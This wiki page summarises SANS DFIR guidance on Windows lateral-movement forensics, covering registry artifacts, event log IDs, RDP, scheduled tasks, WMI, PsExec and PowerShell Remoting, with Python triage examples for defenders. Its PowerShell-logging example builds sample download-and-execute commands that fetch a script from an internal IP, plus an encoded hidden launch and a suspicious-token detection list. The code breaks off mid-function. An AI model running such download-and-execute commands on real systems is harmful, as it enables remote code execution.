SANS DFIR - ToddMaxey/Technical-Documentation GitHub Wiki

# SANS DFIR Poster

# Introducing the New SANS DFIR “Hunt Evil” Poster - YouTube video




Understanding Lateral Movement and Artifact Analysis in Windows Systems

Detecting lateral movement is central to threat hunting and incident response. Attackers use it to move quietly from one compromised system to the next, collecting credentials and data and escalating privileges along the way. Finding it requires knowing the tools involved, the artifacts each one leaves on the source and the destination host, and the patterns (logon types, service installs, remote session events) that separate it from routine administration. Each technique can be mapped to MITRE ATT&CK, which gives analysts a shared vocabulary for what they find and how to respond.

The FOR508 course offered by SANS equips digital forensic professionals with the tools and methodologies necessary for understanding and tracking these movements.


Key Lateral Movement Artifacts

1. RecentApps (Windows 10)

  • Description: Tracks recently executed applications and the files they opened. It was introduced in Windows 10 1607; later feature updates stopped populating it, and Windows 11 does not use it, so treat it as a bonus artifact rather than a dependable one.

  • Location: NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps

  • Interpretation: Each subkey (a GUID) is one application and holds AppId (the executable path), LastAccessedTime (a FILETIME, UTC) and LaunchCount. A RecentItems subkey beneath it lists the files that application opened, which ties a program to the documents it touched.

  • Access Method:

    • Registry Editor: Load the user's NTUSER.DAT hive (File > Load Hive) and navigate to:

      HKEY_USERS\<User_SID>\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps

    • RegRipper: The recentapps plugin parses every entry from an offline hive and converts the timestamps.

    • PowerShell (live system, current user's hive only; each subkey is one entry, and LastAccessedTime has to be converted from FILETIME):

      Get-ChildItem "HKCU:\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps" |
        Get-ItemProperty |
        Select-Object AppId, LaunchCount,
          @{ n = 'LastAccessedTime'; e = { [DateTime]::FromFileTimeUtc($_.LastAccessedTime) } }
      
  • MITRE ATT&CK Reference:

    • T1078: Valid Accounts

2. Jump Lists (Windows 7-11)

  • Description: Jump Lists give quick access to recently or frequently used files and tasks per application (the right-click menu on a taskbar icon). Each application's entries live in a file named after its AppID.

  • Location: %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations (*.automaticDestinations-ms, maintained by Windows) and %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations (*.customDestinations-ms, populated by the application itself).

  • Interpretation: An AutomaticDestinations file is an OLE compound file: its DestList stream holds the ordered list of entries, and every other stream is an LNK structure carrying the target path (local or UNC) and the target's MAC timestamps, so remote shares a user opened show up here. The .automaticDestinations-ms file's creation time is when the first item was added (first use of the application); its modification time is when the last item was added (most recent use).

  • Access Method:

    • JumpList Explorer (GUI) and JLECmd (command line), both by Eric Zimmerman: parse and timeline the AutomaticDestinations and CustomDestinations files.

    • FTK Imager: Image the drive or export the Recent folder from a live system for offline parsing.

    • Hex Editors: For manual inspection of the compound file and its embedded LNK streams.

  • MITRE ATT&CK Reference:

    • T1078: Valid Accounts

3. ShimCache (Application Compatibility Cache)

  • Description: The Application Compatibility Cache records executables the system has examined for shim (compatibility) decisions. Each entry stores the file path and the file's $STANDARD_INFORMATION last-modified time, not an execution time.

  • Location: SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache (value AppCompatCache). The cache is written to the hive only at shutdown or reboot, so an exported hive lags what is in memory.

  • Interpretation: Entries are ordered most-recent-first, which gives relative ordering, but the timestamp is when the binary was last modified, not when it ran. Windows 7 entries carry an "executed" flag; Windows 8 and later do not, and files merely browsed in Explorer can appear, so presence alone does not prove execution. Use ShimCache to recover the paths of tools that have been on the host, then corroborate with Prefetch, Amcache or event logs.

  • Access Method:

    • AppCompatCacheParser (Eric Zimmerman) or ShimCacheParser (Mandiant): Parse an exported SYSTEM hive, including older ControlSets.

    • RegJump (Sysinternals): Jump straight to the key in Registry Editor for manual inspection of the raw value.

    • Volatility: The shimcachemem plugin recovers the in-memory cache during memory analysis, including entries not yet flushed to the hive.

  • MITRE ATT&CK Reference:

    • T1078: Valid Accounts

4. Prefetch Files (Windows 7-11)

  • Description: Prefetch files cache the files and directories an application touched during its first seconds so Windows can preload them. Prefetching is on by default on client Windows and off by default on Windows Server, so its absence on a server is not evidence of tampering.

  • Location: C:\Windows\Prefetch, one file per executable named EXENAME-<hash>.pf, where the hash derives from the executable's full path (and, for hosts such as svchost.exe, its command line).

  • Interpretation: Each .pf file records the run count, the last run time (Windows 8 and later keep the last eight), and the files and directories the program loaded, which can expose a payload's location. The .pf file's creation time approximates the first execution and its modification time the last execution (about ten seconds after launch). Windows 10 and 11 compress prefetch files (MAM / LZXPRESS), so use a parser rather than a hex editor.

  • Access Method:

    • PECmd: A dedicated forensic tool for parsing Prefetch files.

    • FTK Imager: For imaging and extracting Prefetch files from disk.

    • Prefetch Parser: (Autopsy tool) for analyzing forensic details of Prefetch files.

  • MITRE ATT&CK Reference:

    • T1078: Valid Accounts

    • T1021: Remote Services

5. UserAssist (Windows 7-11)

  • Description: Records programs launched through the GUI (Explorer, the Start menu, shortcuts); launches from a command prompt are not counted.

  • Location: NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count. Two GUIDs matter: {CEBFF5CD-ACE2-4F4F-9178-9926F41749EA} for executables and {F4E57C4B-2036-45F0-A9AB-443BCFE33D9F} for shortcut (.lnk) launches.

  • Interpretation: Value names (the program paths) are ROT13-encoded, often with a known-folder GUID standing in for the path prefix. The value data (72 bytes on Windows 7 and later) holds the run count at offset 4, the focus count at offset 8, the focus time in milliseconds at offset 12, and the last-executed FILETIME (UTC) at offset 60.

  • Access Method:

    • RegRipper: The userassist plugin extracts and decodes the names and timestamps automatically.

    • Registry Viewer / Registry Explorer: Manual inspection; Registry Explorer decodes the ROT13 names for you.

    • PowerShell (live system, current user; lists the ROT13 value names under every GUID's Count key):

      Get-ChildItem "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist" |
        ForEach-Object { Get-Item "$($_.PSPath)\Count" } |
        ForEach-Object { $_.GetValueNames() }
      
  • MITRE ATT&CK Reference:

    • T1078: Valid Accounts

6. BAM/DAM (Background Activity Moderator/Desktop Activity Moderator, Windows 10/11)

  • Description: BAM (Windows 10 1709 and later) records, per user SID, the full path and last execution time of programs that ran; DAM is the equivalent for devices that use connected standby and is usually empty on desktops.

  • Location: HKLM\SYSTEM\CurrentControlSet\Services\bam\State\UserSettings\{SID} on builds 1809 and later (earlier builds use bam\UserSettings\{SID}); the same layout exists under ...\Services\dam\.

  • Interpretation: Each value name is a device-form path (\Device\HarddiskVolumeN\...) and its 24-byte data begins with the last-run FILETIME (UTC). Because entries sit under the user's SID, BAM attributes execution to a user, and it remains useful when Prefetch has been cleared or is disabled.

  • Access Method:

    • Registry Editor: Navigate to the key; values appear as REG_BINARY, so timestamps must be decoded by hand.

    • RegRipper: The bam plugin parses the SYSTEM hive and converts the timestamps.

    • PowerShell (live system, run elevated; decodes the FILETIME in the first 8 bytes of each value):

      $bam = "HKLM:\SYSTEM\CurrentControlSet\Services\bam\State\UserSettings"
      Get-ChildItem $bam | ForEach-Object { $k = $_; $k.GetValueNames() | Where-Object { $_ -like '\Device\*' } |
        ForEach-Object { [pscustomobject]@{ SID = $k.PSChildName; Path = $_;
          LastRun = [DateTime]::FromFileTimeUtc([BitConverter]::ToInt64($k.GetValue($_), 0)) } } }
      
  • MITRE ATT&CK Reference:

    • T1078: Valid Accounts
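
The decoders below are an added Python example, not code from this page or from the SANS poster, covering the UserAssist value layout and the BAM value layout described above (the same FILETIME conversion applies to RecentApps' LastAccessedTime). The value names, bytes and the program path are constructed to match those layouts; on a live host the raw bytes would come from a registry API or an offline hive parser, which this example does not include.

```python
import codecs
import struct
from datetime import datetime, timedelta, timezone

# FILETIME used in the constructed values below: 132000000000000000 ticks of
# 100 ns since 1601-01-01, which is 2019-04-17 18:40:00 UTC.
SAMPLE_FILETIME = 132_000_000_000_000_000

# Constructed UserAssist value in the Windows 7+ 72-byte layout: run count 5,
# focus count 2, focus time 90 s, last run = SAMPLE_FILETIME. The value name is
# ROT13 of the program path; codecs builds it so the sample is exact.
SAMPLE_UA_NAME = codecs.encode(r"C:\Tools\PsExec64.exe", "rot13")
SAMPLE_UA_DATA = (
    struct.pack("<IIII", 0, 5, 2, 90_000)  # offsets 0-15: unused, run count, focus count, focus ms
    + b"\x00" * 44                         # offsets 16-59: per-launch float counters (not needed)
    + struct.pack("<Q", SAMPLE_FILETIME)   # offset 60: last-executed FILETIME
    + b"\x00" * 4                          # offset 68: padding
)

# Constructed BAM value: name is the device-form path, data is 24 bytes whose
# first 8 are the last-run FILETIME; the remaining 16 are undocumented.
SAMPLE_BAM_NAME = r"\Device\HarddiskVolume3\Tools\PsExec64.exe"
SAMPLE_BAM_DATA = struct.pack("<Q", SAMPLE_FILETIME) + b"\x00" * 16


def filetime_to_utc(ft):
    """Convert a Windows FILETIME (100 ns ticks since 1601-01-01) to a UTC datetime.
    Zero means 'never recorded'; UserAssist uses it for entries that never ran."""
    if ft == 0:
        return None
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def parse_userassist_value(name, data):
    """Decode one value under ...\\UserAssist\\{GUID}\\Count (Windows 7+ layout)."""
    if len(data) < 68:
        raise ValueError("UserAssist value too short for the Windows 7+ layout")
    run_count, focus_count, focus_ms = struct.unpack_from("<III", data, 4)
    (last_run,) = struct.unpack_from("<Q", data, 60)
    return {
        "program": codecs.decode(name, "rot13"),
        "run_count": run_count,
        "focus_count": focus_count,
        "focus_time": timedelta(milliseconds=focus_ms),
        "last_run": filetime_to_utc(last_run),
    }


def parse_bam_value(name, data):
    """Decode one value under ...\\Services\\bam\\State\\UserSettings\\<SID>."""
    if len(data) < 8:
        raise ValueError("BAM value too short to hold a FILETIME")
    (last_run,) = struct.unpack_from("<Q", data, 0)
    return {"path": name, "last_run": filetime_to_utc(last_run)}


if __name__ == "__main__":
    print(parse_userassist_value(SAMPLE_UA_NAME, SAMPLE_UA_DATA))
    print(parse_bam_value(SAMPLE_BAM_NAME, SAMPLE_BAM_DATA))
```

Both decoders return the timestamp as a timezone-aware UTC datetime; convert to local time only at reporting time, and record which it is, because mixing the two is a common source of timeline errors.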

7. Amcache.hve

  • Description: Amcache is a registry hive populated by the Microsoft Compatibility Appraiser (a scheduled task) with inventory data about executables, drivers and installed programs. It is not written at process creation, so an entry shows the file was present and inventoried, not necessarily that it ran.

  • Location: C:\Windows\AppCompat\Programs\Amcache.hve (locked on a live system; copy it with a raw-access tool such as FTK Imager).

  • Interpretation: Each file entry (InventoryApplicationFile on Windows 10 and later, File on older builds) records the full path, size, publisher and version details, and the SHA-1 of the first 31,457,280 bytes of the file; the entry's key LastWrite time is when the file was first inventoried. The SHA-1 can be looked up against threat intelligence even after the binary has been deleted.

  • Access Method:

    • AmcacheParser (Eric Zimmerman): Parses the hive into CSV, separating file, driver and program entries.

    • Registry Explorer: Direct navigation of the Amcache hive.

    • Manual Access: Copy C:\Windows\AppCompat\Programs\Amcache.hve (plus its .LOG transaction files) from an image or with a raw-access tool.

  • MITRE ATT&CK Reference:

    • T1078: Valid Accounts

    • T1059.001: PowerShell


Artifacts Related to Remote Access and Execution

1. Security Event Log (Security.evtx) and System Event Log (System.evtx)

  • Log Description: The Security log records logons, the use of alternate credentials and privilege assignments; the System log records service installation and state changes. A remote logon leaves a 4624 on the destination and, when alternate credentials were supplied, a 4648 on the source.

  • Key Event IDs (Security.evtx):

    • 4624: Successful logon. Logon Type 3 (network: SMB, WMI, WinRM) and Logon Type 10 (RemoteInteractive: RDP) indicate a remote source, recorded in IpAddress and WorkstationName (T1021: Remote Services, T1078: Valid Accounts)

    • 4648: Logon attempted with explicit (alternate) credentials, logged on the source host (T1078: Valid Accounts)

    • 4672: Special privileges assigned to a new logon, i.e. an administrator-level logon; its SubjectLogonId matches the 4624 TargetLogonId (T1078: Valid Accounts)

    • 4697: Service installed; its SubjectLogonId ties it to the logon that created it. Requires the "Audit Security System Extension" subcategory (T1543.003: Create or Modify System Process: Windows Service; T1569.002: System Services: Service Execution)

    • 4768: Kerberos TGT requested; 4769: Kerberos service ticket (TGS) requested. Both are recorded on the domain controller (T1558: Steal or Forge Kerberos Tickets, including T1558.001 Golden Ticket and T1558.003 Kerberoasting)

    • 4776: NTLM credential validation, on the DC for domain accounts and on the host for local accounts; NTLM logons for an account that normally uses Kerberos are a pass-the-hash indicator (T1550.002: Use Alternate Authentication Material: Pass the Hash; T1078: Valid Accounts)

    • 4778/4779: RDP session reconnected/disconnected, with the source's ClientName and ClientAddress (T1021.001: Remote Desktop Protocol)

  • Key Event IDs (System.evtx):

    • 7034: Service crashed unexpectedly

    • 7035: Service control (start/stop) sent, on older Windows versions

    • 7036: Service entered the running or stopped state

    • 7040: Service start type changed

    • 7045: New service installed; the System-log counterpart of 4697, logged by default even where 4697 auditing is off

2. Remote Desktop Protocol (RDP) Artifacts

  • Log Description: RDP leaves events on both ends. The source host logs outbound connections in Microsoft-Windows-TerminalServices-RDPClient/Operational. The destination logs the inbound connection, the authentication and the session lifecycle across Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational, Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational and Microsoft-Windows-TerminalServices-LocalSessionManager/Operational, plus the Security log (4624 Logon Type 10, 4778/4779).

  • Key Event IDs:

    • 1024, 1102 (source, TerminalServices-RDPClient/Operational): destination host name (1024) and destination IP (1102) of outbound RDP connections (T1021.001: Remote Desktop Protocol)

    • 131, 98 (destination, RemoteDesktopServices-RdpCoreTS/Operational): 131 records an accepted TCP connection with the source IP, 98 a successfully negotiated connection (T1021.001: Remote Desktop Protocol)

    • 1149 (destination, TerminalServices-RemoteConnectionManager/Operational): user authentication succeeded, with user name, domain and source network address

    • 21, 22, 24, 25, 41 (destination, TerminalServices-LocalSessionManager/Operational): session logon succeeded (21), shell start (22), session disconnected (24), session reconnected (25) and session arbitration (41), each with the user and source address; 21/24/25 timestamps bound the period an attacker was interactively on the host.
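
The triage script below is an added Python example, not code from this page or the SANS poster, and serves both the Security/System log section and the RDP section above. It works over constructed event records shaped like the output of an EVTX-to-JSON parser: "Computer" is taken from the System element, the other fields use the EventData names (TargetLogonId, SubjectLogonId, IpAddress, WorkstationName, ServiceName); the TerminalServices 1149 and 21 fields are normalised to readable names here, since their real element names vary by parser. The host names, account names, addresses and LogonIds are invented.

```python
REMOTE_LOGON_TYPES = {3: "network", 10: "remote-interactive (RDP)"}
TS_CHANNEL_PREFIX = "Microsoft-Windows-TerminalServices-"

# Constructed sample: a PsExec-style service install under a network logon,
# an RDP session from the same workstation, an explicit-credential use on the
# source, and an ordinary interactive logon that should produce no finding.
SAMPLE_EVENTS = [
    {"time": "2024-03-15T10:30:00", "channel": "Security", "id": 4648,
     "data": {"Computer": "WKSTN07", "SubjectUserName": "jdoe",
              "TargetUserName": "svc_backup", "TargetServerName": "FILESRV01"}},
    {"time": "2024-03-15T10:30:02", "channel": "Security", "id": 4624,
     "data": {"Computer": "FILESRV01", "TargetUserName": "svc_backup", "TargetLogonId": "0x3e7a1",
              "LogonType": "3", "IpAddress": "10.0.5.17", "WorkstationName": "WKSTN07"}},
    {"time": "2024-03-15T10:30:02", "channel": "Security", "id": 4672,
     "data": {"Computer": "FILESRV01", "SubjectLogonId": "0x3e7a1", "SubjectUserName": "svc_backup"}},
    {"time": "2024-03-15T10:30:04", "channel": "Security", "id": 4697,
     "data": {"Computer": "FILESRV01", "SubjectLogonId": "0x3e7a1", "ServiceName": "PSEXESVC",
              "ServiceFileName": r"%SystemRoot%\PSEXESVC.exe"}},
    {"time": "2024-03-15T11:02:09", "channel": TS_CHANNEL_PREFIX + "RemoteConnectionManager/Operational",
     "id": 1149, "data": {"Computer": "FILESRV01", "User": "jdoe", "Source Network Address": "10.0.5.17"}},
    {"time": "2024-03-15T11:02:10", "channel": "Security", "id": 4624,
     "data": {"Computer": "FILESRV01", "TargetUserName": "jdoe", "TargetLogonId": "0x41c22",
              "LogonType": "10", "IpAddress": "10.0.5.17", "WorkstationName": "WKSTN07"}},
    {"time": "2024-03-15T11:02:12", "channel": TS_CHANNEL_PREFIX + "LocalSessionManager/Operational",
     "id": 21, "data": {"Computer": "FILESRV01", "User": "CORP\\jdoe", "SessionID": "3", "Address": "10.0.5.17"}},
    {"time": "2024-03-15T09:00:00", "channel": "Security", "id": 4624,
     "data": {"Computer": "WKSTN07", "TargetUserName": "jdoe", "TargetLogonId": "0x2b001",
              "LogonType": "2", "IpAddress": "-", "WorkstationName": "WKSTN07"}},
]


def build_sessions(events):
    """Index Security events by LogonId: 4624 opens a session (TargetLogonId),
    4672 marks it privileged and 4697 attaches a service install, both joined
    on SubjectLogonId. Returns {logon_id: session}."""
    sessions = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["channel"] != "Security":
            continue
        d = ev["data"]
        if ev["id"] == 4624:
            sessions[d["TargetLogonId"]] = {
                "time": ev["time"], "host": d["Computer"], "user": d["TargetUserName"],
                "logon_type": int(d["LogonType"]), "source_ip": d["IpAddress"],
                "source_host": d["WorkstationName"], "privileged": False, "services": [],
            }
        elif ev["id"] == 4672 and d["SubjectLogonId"] in sessions:
            sessions[d["SubjectLogonId"]]["privileged"] = True
        elif ev["id"] == 4697 and d["SubjectLogonId"] in sessions:
            sessions[d["SubjectLogonId"]]["services"].append((d["ServiceName"], d["ServiceFileName"]))
    return sessions


def rdp_chain(events, session):
    """TerminalServices events (1149 authentication, 21 session logon) whose user
    and source address match a Logon Type 10 session, as (time, event_id)."""
    user = session["user"].lower()
    hits = []
    for ev in events:
        if not ev["channel"].startswith(TS_CHANNEL_PREFIX) or ev["id"] not in (1149, 21):
            continue
        d = ev["data"]
        addr = d.get("Source Network Address") or d.get("Address")
        if addr == session["source_ip"] and d["User"].lower().split("\\")[-1] == user:
            hits.append((ev["time"], ev["id"]))
    return sorted(hits)


def find_lateral_movement(events):
    """Return (kind, description) findings: remote logons that installed a service
    (PsExec-style), RDP sessions with their TerminalServices chain, privileged
    network logons, and explicit-credential use (4648) on the source host."""
    findings = []
    for s in build_sessions(events).values():
        kind_name = REMOTE_LOGON_TYPES.get(s["logon_type"])
        if kind_name is None:
            continue  # interactive and other local logon types are not lateral movement
        desc = (f'{s["time"]} {s["host"]}: {kind_name} logon as {s["user"]} '
                f'from {s["source_ip"]} ({s["source_host"]}), privileged={s["privileged"]}')
        if s["services"]:
            names = ", ".join(n for n, _ in s["services"])
            findings.append(("remote-service-exec", f"{desc}; installed service(s): {names}"))
        elif s["logon_type"] == 10:
            ids = [i for _, i in rdp_chain(events, s)]
            findings.append(("rdp-session", f"{desc}; TerminalServices events {ids}"))
        elif s["privileged"]:
            findings.append(("privileged-network-logon", desc))
    for ev in events:
        if ev["channel"] == "Security" and ev["id"] == 4648:
            d = ev["data"]
            findings.append(("explicit-credentials", f'{ev["time"]} {d["Computer"]}: {d["SubjectUserName"]} '
                             f'used credentials of {d["TargetUserName"]} toward {d["TargetServerName"]}'))
    return sorted(findings, key=lambda f: f[1])


if __name__ == "__main__":
    for kind, text in find_lateral_movement(SAMPLE_EVENTS):
        print(f"[{kind}] {text}")
```

The LogonId join is the point of the example: 4672 and 4697 carry no source address, so they are only attributable to a remote source through the 4624 that shares the LogonId. When events from several hosts are merged, the 4648 on the workstation lands a few seconds before the 4624 on the server, which is the ordering to look for.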

3. Scheduled Tasks

  • Log Description: Attackers create scheduled tasks for persistence and, with schtasks /S <host> or the at-style remote API, for remote execution on a target. The creation event carries the whole task definition, so it is the single best record of what was scheduled.

  • Key Event IDs (Security.evtx; require the "Audit Other Object Access Events" subcategory):

    • 4698: Task created (TaskContent holds the full task XML, including the command, its arguments and the account it runs as)

    • 4699: Task deleted

    • 4700 / 4701: Task enabled / disabled

    • 4702: Task updated (also carries the new TaskContent)

  • Key Event IDs (Microsoft-Windows-TaskScheduler/Operational; disabled by default on recent Windows and must be enabled):

    • 106: Task registered; 140: Task updated; 141: Task deleted

    • 200 / 201: Task action started / completed, with the command that ran

  • MITRE ATT&CK Reference:

    • T1053.005: Scheduled Task/Job: Scheduled Task
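
The parser below is an added Python example, not code from this page, for the TaskContent XML that 4698 and 4702 carry. The two task definitions are constructed in the Task Scheduler schema (namespace http://schemas.microsoft.com/windows/2004/02/mit/task); the paths and account names in them are invented, and the heuristics in assess_task are this example's own choices, not a published rule set.

```python
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe",
           "mshta.exe", "wscript.exe", "cscript.exe", "certutil.exe", "bitsadmin.exe"}
# Names of core Windows processes that attackers reuse for binaries dropped elsewhere.
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "explorer.exe"}
USER_WRITABLE = re.compile(r"\\(Users\\[^\\]+\\AppData|Users\\Public|Windows\\Temp|ProgramData)\\", re.I)

# Constructed TaskContent as a 4698 would carry it: hidden, SYSTEM, runs a
# fake svchost.exe out of a user-writable directory at every logon.
SAMPLE_MALICIOUS = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author"><Exec><Command>C:\Users\Public\Libraries\svchost.exe</Command><Arguments>-k netsvcs</Arguments></Exec></Actions>
</Task>"""

# Constructed benign task: a vendor updater under the user's own account.
SAMPLE_BENIGN = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T03:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>CORP\jdoe</UserId><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author"><Exec><Command>C:\Program Files\Vendor\Updater.exe</Command><Arguments>/check</Arguments></Exec></Actions>
</Task>"""


def _text(el, path):
    found = el.find(path, TASK_NS)
    return (found.text or "").strip() if found is not None else ""


def parse_task_content(xml_text):
    """Parse TaskContent into the fields that matter for triage. The declaration
    claims UTF-16 but the event delivers text, so it is stripped before parsing."""
    root = ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text))
    triggers = root.find("t:Triggers", TASK_NS)
    return {
        "user_id": _text(root, "t:Principals/t:Principal/t:UserId"),
        "run_level": _text(root, "t:Principals/t:Principal/t:RunLevel"),
        "hidden": _text(root, "t:Settings/t:Hidden").lower() == "true",
        "triggers": [c.tag.split("}")[-1] for c in triggers] if triggers is not None else [],
        "actions": [(_text(ex, "t:Command"), _text(ex, "t:Arguments"))
                    for ex in root.findall("t:Actions/t:Exec", TASK_NS)],
    }


def assess_task(task):
    """List the traits of a parsed task that warrant a closer look."""
    reasons = []
    if task["user_id"].upper() in ("S-1-5-18", "SYSTEM", "NT AUTHORITY\\SYSTEM") \
            or task["run_level"] == "HighestAvailable":
        reasons.append("runs elevated")
    if task["hidden"]:
        reasons.append("hidden from the Task Scheduler UI")
    for cmd, _args in task["actions"]:
        exe = cmd.strip('"').replace("/", "\\").split("\\")[-1].lower()
        if exe in LOLBINS:
            reasons.append(f"living-off-the-land binary: {exe}")
        if USER_WRITABLE.search(cmd):
            reasons.append(f"binary in user-writable path: {cmd}")
        if exe in SYSTEM_NAMES and "\\windows\\system32\\" not in cmd.lower():
            reasons.append(f"system binary name outside System32: {cmd}")
    return reasons


if __name__ == "__main__":
    for sample in (SAMPLE_MALICIOUS, SAMPLE_BENIGN):
        task = parse_task_content(sample)
        print(task["actions"], assess_task(task) or "no findings")
```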

4. Windows Management Instrumentation (WMI)

  • Log Description: WMI serves both remote execution (wmic /node:<host> process call create, Invoke-WmiMethod -Class Win32_Process -Name Create) and persistence through permanent event subscriptions: an __EventFilter, a consumer (CommandLineEventConsumer or ActiveScriptEventConsumer) and a __FilterToConsumerBinding in root\subscription. On the destination, remote execution also shows as a 4624 Logon Type 3 and a new process whose parent is WmiPrvSE.exe.

  • Key Event IDs (Microsoft-Windows-WMI-Activity/Operational):

    • 5857: WMI provider DLL loaded (Operation_ProviderLoad); an unfamiliar provider path is worth a look

    • 5858: Query failed (Operation_ClientFailure); records the client process ID and the query text

    • 5860: Temporary event consumer registered, with the client process and the query

    • 5861: Permanent event consumer registered; the event text contains the filter query and the consumer definition, so it is a direct persistence artifact

  • MITRE ATT&CK Reference:

    • T1047: Windows Management Instrumentation

    • T1546.003: Event Triggered Execution: Windows Management Instrumentation Event Subscription

5. PsExec

  • Log Description: PsExec (Sysinternals) copies its service binary to the target's ADMIN$ share, installs and starts it as the service PSEXESVC over SMB, and relays input and output over named pipes (\PSEXESVC and per-session stdin/stdout/stderr pipes). Re-implementations such as Impacket's psexec.py leave the same service-install pattern with a random service and binary name.

  • Key Artifacts:

    • Destination: 4624 Logon Type 3 followed by 4672 for the account; 4697 (Security) and 7045 (System) for a service named PSEXESVC with image C:\Windows\PSEXESVC.exe (a different name if the -r switch was used); 5140/5145 for ADMIN$ access where file share auditing is on; a PSEXESVC.EXE-<hash>.pf prefetch file; the PSEXESVC.exe binary itself if it was not cleaned up.

    • Source: Prefetch for PSEXEC.EXE or PSEXEC64.EXE; the EULA acceptance value NTUSER.DAT\Software\Sysinternals\PsExec\EulaAccepted; a 4648 if the -u switch supplied alternate credentials.

  • MITRE ATT&CK Reference:

    • T1569.002: System Services: Service Execution

    • T1021.002: Remote Services: SMB/Windows Admin Shares

6. PowerShell Remoting

  • Log Description: PowerShell Remoting (Enter-PSSession, Invoke-Command) runs over WinRM. The source records the session request in its WinRM and PowerShell logs; the destination records the WinRM session, a 4624 Logon Type 3, and wsmprovhost.exe as the host process for the remote commands. Script block logging (4104) must be enabled by policy, but PowerShell 5 and later log script blocks that match built-in suspicious patterns even when it is off.

  • Key Event IDs:

    • Source (Microsoft-Windows-WinRM/Operational): 6 (WSMan session created, names the destination); 8, 15, 16, 33 (session, shell and command closed)

    • Source (Microsoft-Windows-PowerShell/Operational): 40961, 40962 (PowerShell console started, records the local user); 8193, 8194 (session created); 8197 (session closed)

    • Destination (Microsoft-Windows-WinRM/Operational): 91 (session creation); 168 (records the authenticating user)

    • Destination (Microsoft-Windows-PowerShell/Operational): 4103 (module logging: the command and its bound parameters); 4104 (script block logging: the script text after de-obfuscation, split across several events when large); 53504 (records the authenticating user)

    • Destination (Windows PowerShell.evtx): 400/403 (engine started/stopped); 800 (pipeline execution details)

  • MITRE ATT&CK Reference:

    • T1021.006: Remote Services: Windows Remote Management

    • T1059.001: Command and Scripting Interpreter: PowerShell
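
The script below is an added Python example, not code from this page, for working with 4104 script block events: it reassembles blocks that were split across several events (ScriptBlockId, MessageNumber, MessageTotal), reports fragments lost to log rollover, and decodes -EncodedCommand payloads, which are base64 over UTF-16LE. The fragments, the URLs and the payload are constructed; the suspicious-token list is this example's own and is deliberately short.

```python
import base64
import re
from collections import defaultdict

SUSPICIOUS_TOKENS = ("Invoke-Expression", "IEX", "DownloadString", "FromBase64String",
                     "-nop", "Reflection.Assembly", "Invoke-Mimikatz", "Net.WebClient")

# Constructed payload; the encoded form is built here exactly as PowerShell
# expects it for -EncodedCommand (base64 of the UTF-16LE script text).
PLAINTEXT_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.5.99/a.ps1')"
ENCODED_PAYLOAD = base64.b64encode(PLAINTEXT_PAYLOAD.encode("utf-16-le")).decode("ascii")

# Constructed 4104 EventData fragments: block a1 arrives out of order in two
# parts, b2 launches an encoded command, c3 has lost two of its three parts.
SAMPLE_4104 = [
    {"ScriptBlockId": "a1", "MessageNumber": "2", "MessageTotal": "2", "Path": "",
     "ScriptBlockText": "cation/x-www-form-urlencoded'; Invoke-Expression $r.Content"},
    {"ScriptBlockId": "a1", "MessageNumber": "1", "MessageTotal": "2", "Path": "",
     "ScriptBlockText": "$r = Invoke-WebRequest -Uri 'http://10.0.5.99/p' -ContentType 'appli"},
    {"ScriptBlockId": "b2", "MessageNumber": "1", "MessageTotal": "1", "Path": r"C:\Users\Public\run.ps1",
     "ScriptBlockText": f"Start-Process powershell.exe -ArgumentList '-nop -w hidden -enc {ENCODED_PAYLOAD}'"},
    {"ScriptBlockId": "c3", "MessageNumber": "2", "MessageTotal": "3", "Path": "",
     "ScriptBlockText": "Get-Process"},
]


def reassemble_script_blocks(fragments):
    """Group fragments by ScriptBlockId and join them in MessageNumber order.
    Returns {id: {"text", "path", "missing"}}; "missing" lists fragment numbers
    that are absent, typically because the log rolled over."""
    by_id = defaultdict(dict)
    for f in fragments:
        by_id[f["ScriptBlockId"]][int(f["MessageNumber"])] = f
    blocks = {}
    for sbid, parts in by_id.items():
        total = max(int(f["MessageTotal"]) for f in parts.values())
        blocks[sbid] = {
            "text": "".join(parts[n]["ScriptBlockText"] for n in sorted(parts)),
            "path": next(iter(parts.values())).get("Path", ""),
            "missing": [n for n in range(1, total + 1) if n not in parts],
        }
    return blocks


def decode_encoded_commands(text):
    """Find -EncodedCommand arguments (PowerShell accepts any unambiguous prefix:
    -e, -ec, -enc, ...) and decode their base64 UTF-16LE payloads."""
    decoded = []
    for m in re.finditer(r"(?i)(?:^|\s)(-e[a-z]*)\s+([A-Za-z0-9+/=]{8,})", text):
        if not "-encodedcommand".startswith(m.group(1).lower()):
            continue  # -ExecutionPolicy, -ep and similar are not the encoded switch
        try:
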